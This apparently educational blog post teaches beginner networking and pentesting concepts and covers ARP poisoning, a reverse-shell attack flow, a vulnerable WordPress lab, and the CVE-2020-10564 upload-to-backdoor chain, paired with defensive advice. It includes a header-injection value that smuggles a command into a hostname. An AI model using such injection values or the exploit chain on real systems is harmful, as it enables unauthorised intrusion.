Networking Basics - Pentesting Training part 1

Primer:

I want to make a tutorial that I could show my kid to help them understand hacking, methodology, basics, etc... so this is an introduction post, more will follow, and maybe I can add a video series to go along with this.

The first thing to talk about, is what and why. Technology, while ever changing, can will always fall victim to several problems.

First is the idea that use case when created, won't match use case performed. Such as, when creating a remote for a TV, it may use infrared to point to the TV, and that works fine when one TV is in the same room at a time. When more then this is added, conflicts are caused and the light used for remote is picked up by the infrared sensor on multiple TVs. Change channels on one, both go.
Second is that nothing created by man, is or is capable of creating, flawlessness.
Business profits drive innovation, but not perfectionism (or the attempt to become close to perfect).

With these issues together, one can rationalize that hacking, or the intentional modification or alteration for unintended purposes, of anything (not just computing), will be a predominate continuation into the future. As a short example, language (both written and spoken) has been misused by spies, monks, and anyone needing to hide information, so create non-natural language that could convey messages in private. Many cases of this were found dating back to before ancient Egypt and continued today. As such, hacking is not a one stop shop, studying what you have, what you see, what you are presented with, and finding ways around them, no matter what is available, is the way to approach hacking IMO.

Understanding:

So, lets start on what we see today. I have computers that can talk to each other with and without human interaction. We have computers that are used to talk to others, computers in our phones, in our cars, in our billboards, tvs, watches, even light bulbs, screws, and breaker boxes. We live in a very technologically reliant world and all of those computers I just mentioned, can communicate through the internet.

What is the internet:

The internet is a series of tubes. Or so says popular memes and I think that one guy that you can google outside of this tutorial. A good way to think of the internet, in my mind, is more like a multiplexed form of that kids' game where they share a secret and it gets corrupted by the end. But lets say for everyone in the line, you added people in front of and behind them. then, at the same time, everyone told everyone else a secret and who it was designated for. Then send another message whenever they want to whoever they want, but passing along each other's messages as well. Would be hard to keep the same data unchanged going through that wouldn't it? Every time you send unencrypted data, you send it from your device (laptop, desktop, phone, car, tv, picture frame, whatever) it does this in a mechanism called routing.

Its a little more complicated than that though. You say you want to send data to some IP address, okay well "lets do that for you," says the router and forwards it to the next router, then to the next router, all in hopes of reaching the destination. But how would we, in our example of kids whispering secrets to each other, know what best way to provide that information to the right participants? Well what if we gave everyone a number, and our message was "number={whatever number}, {whatever the message was}" and how could we make sure everyone knew how to transport that to the right user? Well, since computers can communicate so fast, this is done using what's called protocols. Procedures to follow to both understand how something is supposed to be sent or received, and how to use those afterword. IP addressing is part of the internet protocol.

Its still more complicated than that. Because there is so many devices connected, how do we answer for who all is responsible for ensuring data gets to the right IP? in the kids example, lets separate those kids into classrooms, where the teacher needs to be responsible for ensuring their students get messages sent to their kids. That teacher has to tell the other teachers "I am responsible for kids 20 through 30". They do so by broadcasting, often loudly, to the nearest teachers, so each teacher can document what each other teacher has said, as well as pass along data requested from other teachers. This is in essence what a protocol known as bgp does. This, along with a register of teachers, known as ASN or autonomous system numbers. Literally, that means numbering of the systems who are approved to broadcast saying they are one of those teachers. So, teachers 1 through 75 as an example.

Don't worry, it's not that bad!

There are actually a number of ways the efficiency of this system has increased over time, while it's not worth going into them all, I feel it would be lacking if I missed the essential case of OSFP a protocol that was designed to inform the shortest path first, so, in the example, if it's easier to tell kid 7 in class 3 then have them pass that along to kid 8 in class 4, in order to get to kid 12 in class 4, then the only transaction needed is knowing which kids are in each class, which should be broadcasted by each teacher.

Almost done:

The reason for describing all of this, is to allow you to understand how these things work together in daily life. There is a whole other thing to talk about on these regards. You may know, when you connect to a website like facebook or youtube or amazon, you connect through a name, but computers use those other address schemes and protocols. The solution to making a network that could communicate so readily widely available to home users, came from the idea of the DNS (domain name system). This functions by use of a top down approach. Starting with top level domains (think of .com, .gov, .cloud, .solutions, etc... and all the sites you've seen like those), then next level (.feemcotech.solutions), then next level and so on. The owner of the tld can control who gets access to create domains inside it. As such, the organization who owns .cloud for instance, can control who owns evil.cloud or myfakewebsite.cloud. but each of those would be in control of access to each sub domain under that. Such as feemcotech.evil.cloud would be under the control of evil.cloud. DNS has name servers associated by the level above to account for where to find more information, such as records for name to ip address for like, google.

The whole process looks roughly like this, with wide variations here and there, and is calculated in nanoseconds.

Then of course, once we know where we want to go, we need simple things like what to transfer, how, when, etc... In situations like google for instance, the procedure works by requesting from your local dns service, to find the top level then burrow down, until you get the appropriate record for the name record associated to the name you're searching. This goes up the routes, and back down the routes, to complete a conversation, as described by the whispering information idea. The next step, once we get those records, we can start talking to the one we really wanted, by saying "now we know the number of the class and student that this is, lets go ask him how his day is." So we do another conversation going up and down the routes but this time directly with our target of our communication. For google, we have a known, or at least expected, open port to connect to for this conversation. In the children example, ports would be something like sorting slots where they can have multiple communications going at once. recording the out-bound port used, allows both to know where the incoming traffic goes to and where it came from. This is useful in protocols like TCP and UDP where they act as front-men to other protocols. Google being the example here, we want web traffic, so http or https. If we try to connect to http, for google along with many sites, redirect http traffic to https (ssl/tls encrypted http traffic).

This isn't a bunch of stuff you need to memorize, please don't see it as that, this is just to help understand that these are all very simple ideas, but when placed together, they seem complex. Or, once could say, complexity is the amount of layering simple things that has to be in place to do the complex task.

Models and graphs:

One very popular thing to do in this realm is create models, or representations of these complex ideas, in hopes of furthering understanding of the topic. Well known models that explain this scenario include the TCP/IP model and the OSI model. Knowing these are fairly essential for understanding computer networking ideas used today and there is A TON of information about these available online. The basis of both models however is to separate which protocols fall under which layer in the complex world of computer networking. I think the OSI wikipedia page has the best, current, resource for this in this single table:

For many years now, a python tool called scapy has made understanding, testing, and programing things on these layers much easier, prior to that I always had to look back at protocol specs to understand how to write code that would fall in line with this. Needless to say, it sucked trying to understand what you were writing like that, and many still code to this day not understanding the architecture or why they should draw out a model before programing it. There is a lot of socket control that's done by the kernel of respective operating systems these days and no one should be programming in real mode assembly exactly, but once we understand some basic networking we can worry about finding those deviations in the implementations of those protocols, or even issues in the protocols themselves, for attack vectors later. A couple examples from a quick google search regarding protocols that are now considered not to be used or found insecure by design, include SMBv1 (later versions fixed these issues, but implementations can still cause their own issues here respectively), wdigest, etc. You can research how these exploits where found and how easy it is today to attack these situations.

Another thing that's really useful, is drawing charts or graphs, to identify problems. People do this when determining scope of threat landscape and understanding weak points, in a process called threat modeling. Attackers often use tools to make it easier to understand where to guide their attacks next, and pentesters (security professionals acting as attackers) use these same tools, their own, or draw up a diagram as needed, to represent attack vectors to a client who is paying them to attack their systems or services. This diagraming seems to have a high return on investment for the time spent, or to say another way people pay more for your time if you do this and they in turn are able to action and understand their security risks better. An example attack flow taken from a hack the box challenge:

In this quickly made chart, we see the scan being performed (nmap, the tool used to scan), the relevant ports, then those connect to the website to show the flow saying this goes to this site. We then see it's running a program that has a known vulnerability. This exploit has a github link and easily runs a command line shell on the system. This gives the attacker access to the system as a user without having to ssh into the system. That access was then used to find an encrypted version of a password in a file the user had access to. From there, the root (or highest user privilege on the system) user's account password was extrapolated. Allowing the user to then change/switch user to the root user using their password. Without ever needing ssh access (the normal way a user would login to the system and run commands).

Since this is still a network based tutorial, lets thing about the network transactions that happened here. In this case, our scanning tool (nmap) showed results for open ports we can connect to. Doing this means that ip packets from the system, containing in this case tcp payloads, which contained another payload that tries to get data from the system and determine the application running, was sent to the target system finding open ports and the related services associated. Even if this detection was mistaken, in this case that didn't matter much except for knowing to try to access a webpage. Which we then sent a request to the web page, where we found information that told us what technology/application was underlying within the website. We used that to research elsewhere how to exploit that. The exploit then made a new series of requests to the site to exploit it and run a command that allowed us access to a command interface, which connected back to our system on a different port we had listening. This process is called a reverse shell or connect-back shell. We then exchange data back and forth through the rest of the exploitation using this communication mechanism.

Attack:

A simple attack you can do, is the popular man-in-the-middle attack known as arp cache poisoning. In this case, we function at a lower level and tell the network that we are the hardware for the ip addresses in question. When you login to a network, you ask the network who-has (ip address) in order to determine which hardware address to send an ip address to. If we do this quicker than the correct responding system, we can make systems on the network believe we are them and send traffic to us. Usually this doesn't mean much for connections that are already made as we may not even need those, forward them on somewhere or whatever if needed. But for new connections, if we decide to tell everyone else in the network that we are the router, and the router that we are everyone else, we can come in between the new connections made in order to create a scenario where we are acting as the router. Remember our example before however, where the routers where the kids who heard things and passed them on, well that's what we're doing here but we've stepped in-between two kids and said that we're the other to each other. There are many tools to do this such as bettercap, mitmproxy, etc... you can do this manually with scapy as well. In some environments, EDR and firewall services can detect arp poisoning by either finding multiple answers on the network for the same arp, multiple macs to different ips, or by seeing that the arp response is different than expected. This isn't very popular these days to use either as a solution, as most devices have automatically generated mac addresses now (by default android phones do and iphones have this option, it's built into functionality of mac and linux devices and has been for many years, its an optional functionality you can setup in windows depending on your device driver). There are a variety of tools to monitor network for new devices, even scan new devices as they enter a network, to determine what they are and hopefully associate to expectations.

Network attacks are fast and wide, and with many modern applications being layered over https, it's hard to imagine many purely network attacks relevant today from the outside, but inside a network is a whole different ball game. In many cases, exploits are chained to achieve network attacks. Such as, an exploit on a web server where it attempts to resolve dns for a field that remains seemingly unused, such as the x-forwarded-for header. You don't need to know exactly what I'm talking about here for this example, but with web services, they pass back and forth headers that are used for various data to the server and to the browser so it can display and react accordingly. In some cases, load balanced systems use x-forwarded-for in order to function as a proxy for the web service. Sort of a middle man that can also help wide spread site usage offload to another instance of the same server running in order to handle workload. In any case, this header can be used for a variety of attack vectors, but mostly to pose as someone internal in hopes of getting different information or whatever. In my case, instead of putting an ip address in this field, I put a domain name. Due to their specialized server setting their socket programming to automatically try to detect ip or hostname and if it's a hostname it responds with an ip for it, I was able to change the dns requests as this comes in. So instead of evil1.attacker.local I chose evil1\x0a\x0a;[command].attacker.local, which broke the request to attacker.local domain lookup into starting a lookup, crashing; attempting to recover meant ability to run a command. This allowed command injection due to the system using a network protocol by default behind the scenes.

When attacking networks, the biggest things to understand:

Scope: For those not involved in this sort of work, basically scope means what you're trying to attack. If you're trying to attack a wireless network for access to the network, sweet. If you're trying to NOT take it further than proving you can access it, then that's a scope limitation. Understanding targets and not targets, allows you to plan accordingly.
Technology Stack in use: While sometimes you can run easily found exploits online with no real thought put into it, and that's fine if it gets you where you're expecting to be, but unless you learn something from it was it useful to you? Nah probably not, unless you want to be dependent on it. Know what technology you're attacking, what mechanisms are supposed to be in place, and what mechanisms are known to be broken or breakable, then try to find new ways to break it. If you're attacking a wireless network, for access, you'll want to know what encapsulation it uses, what encryption it uses, which protocol standard it uses, before launching any real attacks. If you're attacking a website, try to use the website first or while scanning to see if it uses known technology. Whatweb and other such tools are great for finding tech involved, but a form that lets you upload anything at all then open it, is a free and instant win for anyone spending the moment or two to find it.
Interoperability / how related systems operate with each other: This may be part of the tech stack, but it may also not be, so I had to mention that sometimes knowing how systems are related, is essential. An active directory domain controller can grant access to systems controlled by the domain, while a web server may just be a standing webserver. But that webserver having access to that domain controller's website, may mean the ability to brute for logins to the powershell web interface, and gain access to the entire network straight from the webserver. Or a TV that has a wireless connection feature and has never been updated, but is also connected hard-wired to the corporate network to run netflix, means you may only need to exploit a TV that you can connect to wirelessly to gain access to the entire network.

As a lab project, why don't we go ahead and just try to setup a simple website container that we know we can test some exploits on. Hacking websites is a good starter method, but lets keep in mind the entire network transactions going on when doing these attacks. For starters, head over to docker or podman and get yourself acquainted with setting up containers. This will be a basis for how to setup labs and run them and this is substantially faster than virtual machines to stand up and destroy. For the actually lab itself we're going to be using, quick google seems to suggest this dude right here https://github.com/vavkamil/dvwp as a good wordpress exploitable tool. It has things needed to setup the application.

Once we have that setup, lets also setup our attacker container, https://hub.docker.com/r/parrotsec/security from which you can use to attack that wordpress site. Use whatever skills you want, whatever tools you want, just know that there's at least 6 ways to exploit it built into the system so find all of them!

To get you started, I have an example up and running here, starts off giving you a nice little welcome, clearly this site wants to be hacked, it even says so:

Lets go ahead and verify the plugins are available, using wpscan:

Go ahead and google some attacks that can be done here and see what you can do!

Defense:

On the defense side, we need to know what attacks are plausible and what connections /can/ be made, then understand the likelihood and risks involved with preventing those connections. We also need to determine appropriate blocking for each level that we're on. Blocking an IP from https, won't stop a vulnerability like the one tracked as CVE-2020-10564 from being exploited. CVE is a designation given to known vulnerabilities in software that are tracked, while CWE is more generic weakness types that can be found. You can research that on the side, sort of out of the realm of this. But anyway, CVE-2020-10564 is an exploit chain documented well in this script that's used as a proof of concept (evidence the concept works) for the exploit https://github.com/beerpwn/CVE/blob/master/WP-File-Upload_disclosure_report/CVE-2020-10564_exploit.py . The vulnerability exists in the plugin (php or other files designed to be run with authentication and other mechanisms inside the larger technology) installed in the wordpress platform, which is a website blogging service that uses php and can be hosted on most web servers (apache, nginx, etc..). The connection chain leading to these tends to be an ssl/tls encrypted tcp connection to port 443, over ip. The example lab, can use http without encryption and is designed to be unencrypted. This means you can use your wireshark or tcpdump or any similar network sniffing tool to monitor your attacks and track the flow of them. This, is the general principal behind network flow monitoring and alerting is generally added along to that to automate the process. Firewalls or one kind or another generally are where you'd want to keep this sort of understanding and generally the better detection you have for each layer, the more appropriately you can respond.

Looking at the proof of concept for this exploit, it appears to follow a chain of events something like this:

The payload data gets set to a directory traversal (../) change that then allows access to another folder, under which plugins directory is accessed, then the wp-file-upload and lib folders respectively. Afterwords it appends the filename: "payload = "../plugins/wp-file-upload/lib/" + filename"
It then changes that into hexadecimal: "payload = payload.encode("hex")"
It then sets a common php backdoor as "php_code" and collects a filesize from that
It then sends a request to the file webpage /wp-admin/admin-ajax.php for the website.

That request contains a post request sent with a request to the plugin using an ajax function wfu_ajax_action_ask_server . Ajax is a set of programing tools and interfaces based on helping create client side interfaces more enjoyable. In this case, it's used by wordpress to facilitate page interactions, that are expected to come through this interface instead of from a direct connection to the page.
If that responds with a wfu_askserver_success it asks for another request, which appears to be setting (from rough glance) some basic information about the file to be sent.
If that succeeds the same way, it then responds with additional data including the file content, in this case the php code.

It then sends a request to the target with a parameter specified in the php shell ideally now uploaded and running.

it loops waiting for a command then sending this request with the command added, until exit is sent.

How can we protect against this? That seems like it's many layers up the stack and not really something manageable! OH NO! But wait, anything complex, is just a series of simple things. This isn't a hard problem, just a complex one. If we had a firewall, a system or program geared towards being able to block at various levels, where should we implement a block to prevent this attack? Well the real answer is we should fix the code to never allow it, but lets pretend we can't do that for whatever reason.

Would blocking tcp connections help? Nah, probably not because that would stop the website from functioning.
Would blocking atm traffic help? Nope, that's entirely irrelevant.
Would blocking http traffic help? Nope, again, would stop site from functioning.
Would blocking arp traffic help? No, that would stop local communication and ultimately still end in site not functioning again.
Would creating an application gateway for anything running visualfox pro from making any write attempts help? This too, is entirely irrelevant.
Would creating a php application gateway, that could limit the requests made by php to the filesystem help? yes, and this may need to be expanded on to really understand scope of this. This would stop the initial ../ directory traversal used to then expose a library folder that this gets written to.
Would creating an ajax gateway that could block known exploitable calls from being sent to the ajax php code help? yes as well.

So from a quick rundown of what makes sense here, we'd need some sort of way to prevent calls we don't like from being accepted by the ajax service, and also prevent calls from php to the filesystem that we don't want. For the ajax, a simple way to do this would be to have a deny-list of functions or likely-suspicious calls, and simply make a php page that grabs the entire request, checks each portion of the request for any known issues, then forwards it onto the real page. Then, for the real page, rename it to something else, restrict access to it from bring ran in the webserver (so users can't forge requests to it), then make it expect data from the other page as a limitation on where locally it can receive requests from. This would be an easy way to handle this without specialized tooling or million dollar platforms. For the PHP side, there is already a handler inside php for this, in the php.ini file. In both cases, you could also put something just outside the system for a web application firewall (WAF) to further limit these and many other events.

Risk versus reward

Unfortunately, with defense, there will always be a problem of risk versus reward. The best case scenario, would be to layer all these defenses together, not just one or another. If you created a means of controlling ajax, and a means of controlling php, and controlled file/folder permissions correctly otherwise, and also provided a WAF implementation, that would be extremely ideal. But in reality that's a lot of things to maintain, adjust to new code, admin, or otherwise just simply keep running for a long time with new technologies coming in. Things that are admin intensive or developer intensive (both may apply here), are hard for companies because it means paying someone for those and that takes costs away from other things like perhaps the website itself being updated or customers getting their products or services. Due to this, what is the least intensive, highest security, option? In many cases, a WAF is plenty to prevent all these types of issues, but also heavily assumes that the waf was configured properly. Some sites pay for a managed version of waf controlled by azure or cloudflare, and in many of these cases, leave only the default ruleset and never change anything. But this same ruleset when managed, can be applied to a wide variety of tools and services. So it costs less to apply it across the board with standard rulesets than it would cost in dev time to monitor every call at the system by system, or container by container, level. Preventing it from crossing the network to those systems, by being a gateway for all of them. Site.evil.private and wordpress.evil.private could both be controlled by the same waf with the same rules, while both exist on containers inside kubernetes clusters, inside servers, hosted by 3 different companies. If we wanted to scale that way. But a single person, for instance, it may be more cost effective to spend the hours of development and admin time themselves on their website, and never put them behind a waf. There's also a bit further we could get into here like load balancing techniques, tools to prevent dos attacks, etc.. but this should be a good stopping point.

Stay tuned...

I'll try to post more along this same lines to get more into how to do various things, but I feel like primer, some methodology, and otherwise reasoning was needed before we get into telling people to run a command here or a command there.

Thanks for reading

If you need any IT or CyberSecurity work remotely or within the DFW area, please contact us over at FeemcoTechnologies.

Search

Tech Help